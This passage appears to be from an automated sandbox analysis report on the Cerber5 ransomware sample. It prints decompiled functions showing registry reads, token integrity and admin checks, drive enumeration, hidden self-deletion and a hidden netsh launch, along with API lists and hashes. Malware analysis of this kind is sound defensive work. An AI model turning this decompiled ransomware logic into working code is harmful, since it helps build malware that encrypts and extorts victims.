                                                                                                                                                                                        • Instruction Fuzzy Hash: 701293B1D04209BEDB10ABA5DC46FAF7B78EB05704F11447BF505F61C2E6785A088F6A
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 317 40b53e-40b587 call 40591c * 2 call 40b08e 324 40b64b-40b650 317->324 325 40b58d-40b59b StrChrW 317->325 326 40b5a1-40b5e4 StrCpyNW GetTempPathW lstrcatW StrChrW 325->326 327 40b642-40b64a call 405463 325->327 326->327 328 40b5e6-40b608 StrCpyNW StrChrW 326->328 327->324 328->327 330 40b60a-40b62a StrCpyNW StrChrW 328->330 330->327 332 40b62c-40b63e StrCpyNW 330->332 332->327
                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E0040B53E(void* __ecx) {
                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                        				WCHAR* _v12;
                                                                                                                                                                                        				short _v212;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                        				WCHAR* _t14;
                                                                                                                                                                                        				WCHAR* _t16;
                                                                                                                                                                                        				WCHAR* _t26;
                                                                                                                                                                                        				WCHAR* _t31;
                                                                                                                                                                                        				WCHAR* _t36;
                                                                                                                                                                                        				WCHAR* _t44;
                                                                                                                                                                                        				WCHAR* _t46;
                                                                                                                                                                                        				WCHAR* _t47;
                                                                                                                                                                                        				WCHAR* _t49;
                                                                                                                                                                                        				WCHAR* _t52;
                                                                                                                                                                                        				WCHAR* _t53;
                                                                                                                                                                                        				WCHAR* _t54;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                        				_t11 = E0040591C(0x40d958, 0xb, 0xa0dd64f4);
                                                                                                                                                                                        				_t14 = E0040B08E( &_v12, __ecx, E0040591C(0x40d964, 0x1f, 0xab845937), _t11); // executed
                                                                                                                                                                                        				_t44 = _t14;
                                                                                                                                                                                        				_v12 = _t44;
                                                                                                                                                                                        				if(_t44 == 0) {
                                                                                                                                                                                        					L7:
                                                                                                                                                                                        					return _v5;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					_t16 = StrChrW(_t44, 0x2d);
                                                                                                                                                                                        					_t49 = _t16;
                                                                                                                                                                                        					if(_t49 != 0) {
                                                                                                                                                                                        						StrCpyNW( &_v212, _t44, (_t16 - _t44 >> 1) + 1);
                                                                                                                                                                                        						GetTempPathW(0x104, 0x42fbc8);
                                                                                                                                                                                        						lstrcatW(0x42fbc8,  &_v212);
                                                                                                                                                                                        						_t52 =  &(_t49[1]);
                                                                                                                                                                                        						_t26 = StrChrW(_t52, 0x2d);
                                                                                                                                                                                        						_t46 = _t26;
                                                                                                                                                                                        						if(_t46 != 0) {
                                                                                                                                                                                        							StrCpyNW("68f6", _t52, (_t26 - _t52 >> 1) + 1);
                                                                                                                                                                                        							_t6 =  &(_t46[1]); // 0x2
                                                                                                                                                                                        							_t53 = _t6;
                                                                                                                                                                                        							_t31 = StrChrW(_t53, 0x2d);
                                                                                                                                                                                        							_t47 = _t31;
                                                                                                                                                                                        							if(_t47 != 0) {
                                                                                                                                                                                        								StrCpyNW("4e9a", _t53, (_t31 - _t53 >> 1) + 1);
                                                                                                                                                                                        								_t7 =  &(_t47[1]); // 0x2
                                                                                                                                                                                        								_t54 = _t7;
                                                                                                                                                                                        								_t36 = StrChrW(_t54, 0x2d);
                                                                                                                                                                                        								if(_t36 != 0) {
                                                                                                                                                                                        									StrCpyNW("955c", _t54, (_t36 - _t54 >> 1) + 1);
                                                                                                                                                                                        									_v5 = 1;
                                                                                                                                                                                        								}
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					E00405463(_v12);
                                                                                                                                                                                        					goto L7;
                                                                                                                                                                                        				}
                                                                                                                                                                                        			}





















                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 0040B08E: RegOpenKeyExW.KERNEL32(80000002,0040B57E,00000000,00020119,0040B57E,00000000,00000000,?,?,?,?,0040B57E,00000000,?,?,00000000), ref: 0040B0AE
                                                                                                                                                                                          • Part of subcall function 0040B08E: RegQueryValueExW.KERNEL32(0040B57E,?,00000000,00000000,00000000,00000000,?,?,?,?,0040B57E,00000000,?,?,00000000), ref: 0040B0C8
                                                                                                                                                                                          • Part of subcall function 0040B08E: RegQueryValueExW.KERNEL32(0040B57E,?,00000000,00000000,00000000,00000000,?,?,?,?,0040B57E,00000000,?,?,00000000), ref: 0040B0ED
                                                                                                                                                                                          • Part of subcall function 0040B08E: RegCloseKey.ADVAPI32(0040B57E,?,?,?,?,0040B57E,00000000,?,?,00000000,?,?,00000000), ref: 0040B10E
                                                                                                                                                                                        • StrChrW.SHLWAPI(00000000,0000002D,00000000,?,00000000,?,?,00000000), ref: 0040B591
                                                                                                                                                                                        • StrCpyNW.SHLWAPI(?,00000000,00000001,?,00000000,?,?,00000000), ref: 0040B5AF
                                                                                                                                                                                        • GetTempPathW.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\d06ed635,?,00000000,?,?,00000000), ref: 0040B5C0
                                                                                                                                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\d06ed635,?), ref: 0040B5CE
                                                                                                                                                                                        • StrChrW.SHLWAPI(-00000002,0000002D,?,00000000,?,?,00000000), ref: 0040B5DA
                                                                                                                                                                                        • StrCpyNW.SHLWAPI(68f6,-00000002,00000001,?,00000000,?,?,00000000), ref: 0040B5F2
                                                                                                                                                                                        • StrChrW.SHLWAPI(00000002,0000002D,?,00000000,?,?,00000000), ref: 0040B5FE
                                                                                                                                                                                        • StrCpyNW.SHLWAPI(4e9a,00000002,00000001,?,00000000,?,?,00000000), ref: 0040B616
                                                                                                                                                                                        • StrChrW.SHLWAPI(00000002,0000002D,?,00000000,?,?,00000000), ref: 0040B622
                                                                                                                                                                                        • StrCpyNW.SHLWAPI(955c,00000002,00000001,?,00000000,?,?,00000000), ref: 0040B638
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: QueryValue$CloseOpenPathTemplstrcat
                                                                                                                                                                                        • String ID: 4e9a$68f6$955c$C:\Users\user\AppData\Local\Temp\d06ed635
                                                                                                                                                                                        • API String ID: 3283998727-2142354402
                                                                                                                                                                                        • Opcode ID: 7f4274f67ac4a1bc1059d1d700c6df9c3a70b4ef4c444a0a3130088cdf564e7b
                                                                                                                                                                                        • Instruction ID: 32be6bc6edbcde913aa383d40c1836da8f2025cb8ba36b10733c938e06cc4411
                                                                                                                                                                                        • Opcode Fuzzy Hash: 7f4274f67ac4a1bc1059d1d700c6df9c3a70b4ef4c444a0a3130088cdf564e7b
                                                                                                                                                                                        • Instruction Fuzzy Hash: C52126779006227AD32057A49D0EFAF3E68DF84B00F040836F954F22C1EF75DA0586AE
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                        			E004082AB(void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                        				char _v8;
                                                                                                                                                                                        				char _v12;
                                                                                                                                                                                        				struct _SHELLEXECUTEINFOW _v72;
                                                                                                                                                                                        				short _v592;
                                                                                                                                                                                        				short _v1112;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                        				signed int _t42;
                                                                                                                                                                                        				void* _t48;
                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                        				intOrPtr* _t51;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t42 = __edx;
                                                                                                                                                                                        				_t41 = __ecx;
                                                                                                                                                                                        				_t19 = E004031AF(_a4, __eflags, E00405905(0x40d6c0, 0xd, 0x4756bd1a));
                                                                                                                                                                                        				_t49 = _t48 + 0x10;
                                                                                                                                                                                        				_t21 = E00403253(_t19, __eflags) | _t42;
                                                                                                                                                                                        				_t55 = _t21;
                                                                                                                                                                                        				if(_t21 != 0) {
                                                                                                                                                                                        					_push(__edi);
                                                                                                                                                                                        					SHChangeNotify(4, 0x3005, 0x42f840, 0); // executed
                                                                                                                                                                                        					MoveFileExW(0x42f840, 0, 4); // executed
                                                                                                                                                                                        					_push(0x42f840);
                                                                                                                                                                                        					_push(PathFindFileNameW(0x42f840));
                                                                                                                                                                                        					_push(E0040591C(0x40d6d0, 0x55, 0x2e7fd69b));
                                                                                                                                                                                        					_push( &_v8);
                                                                                                                                                                                        					_t21 = E00405B0C(__ebx, _t41, 0, 0x42f840, _t55);
                                                                                                                                                                                        					_t51 = _t49 + 0x1c;
                                                                                                                                                                                        					_t56 = _t21;
                                                                                                                                                                                        					if(_t21 != 0) {
                                                                                                                                                                                        						E00405F6B(_t41, _t56,  &_v12);
                                                                                                                                                                                        						 *_t51 = 0x104;
                                                                                                                                                                                        						GetSystemDirectoryW( &_v592, ??);
                                                                                                                                                                                        						_push( &_v592);
                                                                                                                                                                                        						wsprintfW( &_v1112, E0040591C(0x40d6b4, 0xa, 0x1440d523));
                                                                                                                                                                                        						memset( &(_v72.fMask), 0, 0x38);
                                                                                                                                                                                        						_v72.cbSize = 0x3c;
                                                                                                                                                                                        						_v72.fMask = 0x8600;
                                                                                                                                                                                        						_v72.lpVerb = E0040591C(0x40d6ac, 4, 0x96d648ae);
                                                                                                                                                                                        						_v72.lpFile =  &_v1112;
                                                                                                                                                                                        						_v72.lpParameters = _v8;
                                                                                                                                                                                        						_v72.nShow = 0;
                                                                                                                                                                                        						ShellExecuteExW( &_v72); // executed
                                                                                                                                                                                        						_t21 = E00405463(_v8);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					ExitProcess(0);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t21;
                                                                                                                                                                                        			}


















                                                                                                                                                                                        APIs
                                                                                                                                                                                        • SHChangeNotify.SHELL32(00000004,00003005,C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe,00000000), ref: 004082F2
                                                                                                                                                                                        • MoveFileExW.KERNEL32(C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe,00000000,00000004,?,?,?,00000000), ref: 004082FC
                                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe,C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe,?,?,?,00000000), ref: 00408304
                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 004083CD
                                                                                                                                                                                          • Part of subcall function 00405F6B: GetModuleHandleA.KERNEL32(00000000,?,?,00000000,C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe,0040833D,?,?,?,?,?,?,?,00000000), ref: 00405FA1
                                                                                                                                                                                          • Part of subcall function 00405F6B: GetProcAddress.KERNEL32(00000000), ref: 00405FA8
                                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,?), ref: 0040834B
                                                                                                                                                                                        • wsprintfW.USER32 ref: 00408374
                                                                                                                                                                                        • memset.NTDLL ref: 00408381
                                                                                                                                                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 004083C1
                                                                                                                                                                                          • Part of subcall function 00405463: GetLastError.KERNEL32(00000000,00405722), ref: 0040546D
                                                                                                                                                                                          • Part of subcall function 00405463: RtlFreeHeap.NTDLL(00000000,-00000008), ref: 0040549A
                                                                                                                                                                                          • Part of subcall function 00405463: SetLastError.KERNEL32(00000000), ref: 004054A1
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ErrorFileLast$AddressChangeDirectoryExecuteExitFindFreeHandleHeapModuleMoveNameNotifyPathProcProcessShellSystemmemsetwsprintf
                                                                                                                                                                                        • String ID: <$C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe
                                                                                                                                                                                        • API String ID: 2654349300-1496615427
                                                                                                                                                                                        • Opcode ID: ff9b78ff71d073ab14403cc3809422da466c707121bc5d55e0ae23cacb143a43
                                                                                                                                                                                        • Instruction ID: e81e65f490f2918546cf3dc480cadbfd72196a89e8115570de0b66540c6f6c56
                                                                                                                                                                                        • Opcode Fuzzy Hash: ff9b78ff71d073ab14403cc3809422da466c707121bc5d55e0ae23cacb143a43
                                                                                                                                                                                        • Instruction Fuzzy Hash: CF2182B1C40218BBDB10ABA1DD49F9F7BBCEB44715F04047AF608B6181E7785A488F6D
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E00406005(void* __ecx) {
                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				int _t16;
                                                                                                                                                                                        				int _t20;
                                                                                                                                                                                        				long _t30;
                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t30 = 0;
                                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                                        				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v12) != 0) {
                                                                                                                                                                                        					_v8 = 0;
                                                                                                                                                                                        					_t16 = GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                                                                                                                                                                        					if(_t16 != 0 || GetLastError() == 0x7a) {
                                                                                                                                                                                        						_t33 = LocalAlloc(0x40, _v8);
                                                                                                                                                                                        						if(_t33 != _t30) {
                                                                                                                                                                                        							_t20 = GetTokenInformation(_v12, 0x19, _t33, _v8,  &_v8); // executed
                                                                                                                                                                                        							if(_t20 != 0) {
                                                                                                                                                                                        								_t30 =  *(GetSidSubAuthority( *_t33,  *(GetSidSubAuthorityCount( *_t33)) - 0x00000001 & 0x000000ff));
                                                                                                                                                                                        							}
                                                                                                                                                                                        							LocalFree(_t33);
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					FindCloseChangeNotification(_v12); // executed
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t30;
                                                                                                                                                                                        			}










                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000000,00000000,?,004067F8), ref: 00406016
                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,004067F8), ref: 0040601D
                                                                                                                                                                                        • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?,?,004067F8), ref: 00406035
                                                                                                                                                                                        • GetLastError.KERNEL32(?,004067F8), ref: 0040603F
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000000,?,004067F8), ref: 00406050
                                                                                                                                                                                        • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?,?,004067F8), ref: 00406069
                                                                                                                                                                                        • GetSidSubAuthorityCount.ADVAPI32(00000000,?,004067F8), ref: 00406075
                                                                                                                                                                                        • GetSidSubAuthority.ADVAPI32(00000000,?,?,004067F8), ref: 00406085
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,004067F8), ref: 0040608E
                                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(?,004067F8), ref: 00406098
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Token$AuthorityInformationLocalProcess$AllocChangeCloseCountCurrentErrorFindFreeLastNotificationOpen
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2684962006-0
                                                                                                                                                                                        • Opcode ID: 8cdcdb099773aa73dff319db42a612ccbdfaf0fca6c691c724fc3d702d28fb54
                                                                                                                                                                                        • Instruction ID: 8cb5e333a96f95fad98f0925d080cf7ecd4ccd4366d947745b1979e041030130
                                                                                                                                                                                        • Opcode Fuzzy Hash: 8cdcdb099773aa73dff319db42a612ccbdfaf0fca6c691c724fc3d702d28fb54
                                                                                                                                                                                        • Instruction Fuzzy Hash: E911467A600104FFDB219FA1DD08DAE7F79EB45711F1000B9F906F26A0D7359A18EB68
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                                                                        			E0040A8DF(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8, char _a12) {
                                                                                                                                                                                        				char _v12;
                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                        				char _v24;
                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                        				long _v32;
                                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                                        				char _v44;
                                                                                                                                                                                        				char _v68;
                                                                                                                                                                                        				short _v592;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                        				intOrPtr _t48;
                                                                                                                                                                                        				void* _t50;
                                                                                                                                                                                        				intOrPtr _t61;
                                                                                                                                                                                        				void* _t77;
                                                                                                                                                                                        				void* _t78;
                                                                                                                                                                                        				void* _t79;
                                                                                                                                                                                        				void* _t82;
                                                                                                                                                                                        				void* _t88;
                                                                                                                                                                                        				void* _t89;
                                                                                                                                                                                        				long _t90;
                                                                                                                                                                                        				void* _t92;
                                                                                                                                                                                        				void* _t94;
                                                                                                                                                                                        				void* _t95;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t87 = __edx;
                                                                                                                                                                                        				_t79 = __ecx;
                                                                                                                                                                                        				E00402C20(_t77, __edx, _t88, _t92);
                                                                                                                                                                                        				_t95 = _t94 + 0x14;
                                                                                                                                                                                        				_v32 = GetTickCount();
                                                                                                                                                                                        				 *0x40f1d8( &_v68, _a4, E0040591C(0x40d8b4, 0x13, 0x682561bd));
                                                                                                                                                                                        				_v24 = 0;
                                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                                        				_v28 = 0;
                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                        				_t78 = E0040622D(_t77, _t79);
                                                                                                                                                                                        				GetSystemDirectoryW( &_v592, 0x104); // executed
                                                                                                                                                                                        				_t48 = E0040A0A4(); // executed
                                                                                                                                                                                        				_v36 = _t48;
                                                                                                                                                                                        				_t89 = 0;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t50 = E0040A892(_v36,  &_v44);
                                                                                                                                                                                        					_pop(_t82);
                                                                                                                                                                                        					if(_t50 >= 2 && (_t50 <= 3 || _t50 == 6)) {
                                                                                                                                                                                        						_t22 =  &_v20; // 0x406633
                                                                                                                                                                                        						E0040A80E(_t82, _t78,  &_v44, _t22,  &_v68,  &_v16,  &_v12,  &_v28,  &_v24, (_v592 & 0xffffff00 | _v592 == _v44) & 0x000000ff); // executed
                                                                                                                                                                                        						_t95 = _t95 + 0x24;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t89 = _t89 + 1;
                                                                                                                                                                                        				} while (_t89 <= 0x19);
                                                                                                                                                                                        				E0040630E(_t78);
                                                                                                                                                                                        				E0040634B(_t78, _t78);
                                                                                                                                                                                        				_t90 = GetTickCount();
                                                                                                                                                                                        				if(E00402C54(_t87, _a4) != 0) {
                                                                                                                                                                                        					_push(_t90 - _v32);
                                                                                                                                                                                        					_push(E0040591C( &E0040D8C8, 0x1f, 0x34d17065));
                                                                                                                                                                                        					_push(_a4);
                                                                                                                                                                                        					E00402C20(_t78, _t87, _t90 - _v32, 0);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				if(_v20 != 0) {
                                                                                                                                                                                        					_t61 = _v16;
                                                                                                                                                                                        					if(_v12 != 0) {
                                                                                                                                                                                        						 *_v28 = _t61;
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						_v12 = _t61;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					 *_a8 = _v12;
                                                                                                                                                                                        					_t35 =  &_a12; // 0x406633
                                                                                                                                                                                        					 *((intOrPtr*)( *_t35)) = _v24;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				 *0x40f1e0( &_v68);
                                                                                                                                                                                        				return 0 | _v20 != 0x00000000;
                                                                                                                                                                                        			}































                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 0040A908
                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL(?), ref: 0040A915
                                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040A93F
                                                                                                                                                                                          • Part of subcall function 0040A0A4: GetLogicalDrives.KERNEL32 ref: 0040A0AD
                                                                                                                                                                                          • Part of subcall function 0040A0A4: RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,00000000), ref: 0040A0ED
                                                                                                                                                                                          • Part of subcall function 0040A0A4: RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040A123
                                                                                                                                                                                          • Part of subcall function 0040A0A4: RegCloseKey.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040A138
                                                                                                                                                                                          • Part of subcall function 0040A892: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040A8D4
                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 0040A9B9
                                                                                                                                                                                        • RtlDeleteCriticalSection.NTDLL(?), ref: 0040AA1D
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CountCriticalSectionTick$CloseDeleteDirectoryDrivesInitializeLogicalOpenQuerySystemValuelstrcpy
                                                                                                                                                                                        • String ID: 0jt$3f@$3f@
                                                                                                                                                                                        • API String ID: 4201821548-612658434
                                                                                                                                                                                        • Opcode ID: 292e2c22d9d0e416b2523cc020573ba9d17a2e029693af9b1a6c4d4d7aef3f44
                                                                                                                                                                                        • Instruction ID: 694c260ad55fdb15e18b233715df8a646d2816963bf82ac05ff2a62387601ac6
                                                                                                                                                                                        • Opcode Fuzzy Hash: 292e2c22d9d0e416b2523cc020573ba9d17a2e029693af9b1a6c4d4d7aef3f44
                                                                                                                                                                                        • Instruction Fuzzy Hash: 92416FB2D00219ABCB11AFE5DC458EF7BB8EF48310F10443BF501F6281EA388A55CBA5
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        C-Code - Quality: 66%
                                                                                                                                                                                        			E0040137F(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                        				struct _PROCESS_INFORMATION _v24;
                                                                                                                                                                                        				struct _STARTUPINFOA _v92;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                        
                                                                                                                                                                                        				_push(_a4);
                                                                                                                                                                                        				_push("C:\\Windows\\system32\\netsh.exe");
                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                        				_push(E00405905(0x40ceb4, 0x11, 0x65f84038));
                                                                                                                                                                                        				_push( &_v8);
                                                                                                                                                                                        				E00405B59(__ebx, __ecx, __edi, 0, __eflags);
                                                                                                                                                                                        				memset( &(_v92.lpReserved), 0, 0x40);
                                                                                                                                                                                        				_v92.cb = 0x44;
                                                                                                                                                                                        				_t21 = CreateProcessA(0, _v8, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24); // executed
                                                                                                                                                                                        				if(_t21 != 0) {
                                                                                                                                                                                        					if(WaitForSingleObject(_v24.hProcess, 0x1388) == 0x102) {
                                                                                                                                                                                        						TerminateProcess(_v24.hProcess, 0); // executed
                                                                                                                                                                                        					}
                                                                                                                                                                                        					CloseHandle(_v24);
                                                                                                                                                                                        					CloseHandle(_v24.hThread);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return E00405463(_v8);
                                                                                                                                                                                        			}










                                                                                                                                                                                        APIs
                                                                                                                                                                                        • memset.NTDLL ref: 004013B8
                                                                                                                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004013DD
                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?,00000000), ref: 004013EF
                                                                                                                                                                                        • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00401400
                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401409
                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401412
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CloseHandleProcess$CreateObjectSingleTerminateWaitmemset
                                                                                                                                                                                        • String ID: C:\Windows\system32\netsh.exe$D
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        control_flow_graph 437 402d06-402d1f 438 402d21-402d38 GetTokenInformation 437->438 439 402d5e-402d6f DuplicateToken 437->439 440 402da7-402db1 438->440 441 402d3a-402d3e 438->441 439->440 442 402d71-402d8b CreateWellKnownSid 439->442 443 402d40-402d57 GetTokenInformation 441->443 444 402d59-402d5c 441->444 442->440 445 402d8d-402da1 CheckTokenMembership FindCloseChangeNotification 442->445 443->440 443->444 444->439 444->442 445->440
                                                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                                                        			E00402D06(void* _a4) {
                                                                                                                                                                                        				void _v8;
                                                                                                                                                                                        				long _v12;
                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                        				void _v20;
                                                                                                                                                                                        				char _v88;
                                                                                                                                                                                        				int _t37;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                        				if( *0x43072c < 6) {
                                                                                                                                                                                        					L5:
                                                                                                                                                                                        					if(DuplicateToken(_a4, 1,  &_v8) == 0) {
                                                                                                                                                                                        						L8:
                                                                                                                                                                                        						return 0 | _v16 != 0x00000000;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					L6:
                                                                                                                                                                                        					_push( &_v12);
